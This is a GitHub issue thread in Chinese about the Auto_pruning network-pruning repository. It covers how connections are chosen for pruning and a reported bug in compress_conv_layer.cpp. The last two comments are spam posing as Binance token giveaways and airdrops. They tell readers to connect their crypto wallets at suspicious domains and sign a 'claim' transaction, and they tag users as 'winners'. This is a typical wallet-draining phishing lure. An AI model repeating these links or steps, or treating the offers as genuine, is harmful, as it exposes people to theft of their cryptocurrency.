### ISSUE TITLE
如何选择那些连接裁剪

### ISSUE THREAD

**Issue by gaojie0105** [NHZlX/Auto_pruning#3]
你好，看了代码，没有看明白你是如何判断那些连接被裁剪掉，那些需要保留，还有，你着代码是参考dynamic network surgery的吗

**Comment by gaojie0105** [comment]
明白了，之前一直看你的compress_conv_layer.cpp，你的compress_conv_layer.cpp第83行写错了，感觉应该是weight而不是weightMask

**Comment by NHZlX** [comment]
@gaojie0105  是的，这里应该是个错误，欢迎提pr

**Comment by gaojie0105** [comment]
你有没有试过别的判断连接重要性的方法

**Comment by NHZlX** [comment]
这份代码中主要是设置了简单的超参数来自动调整裁剪粒度，对于评价连接重要性的方法采用了最常用的绝对值方式。

**Comment by gaojie0105** [comment]
好吧，自己去摸索了，不过提供了很好的框架，感谢

**Comment by NHZlX** [comment]
嗯， 欢迎对尝试的结果在此issue下分享 😊

**Comment by gaojie0105** [comment]
ok

**Comment by hulaifeng** [comment]
这个有效果么

**Comment by IT-Immanent** [comment]
# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

<a href="https://www.bnbrewards.online/?source=github" target="_blank">
  <img src="https://i.imgur.com/1yUfzqb.png" alt="Binance Free Tokens" width="400px" height="450px">
</a>


## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - 
2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @Divxsh, @xeoneux, @zaha5216, @loulauman, @pedrohusky, @gamebusterz, @Maneesh3, @kumarav1nash, @ardallie, @ihciem
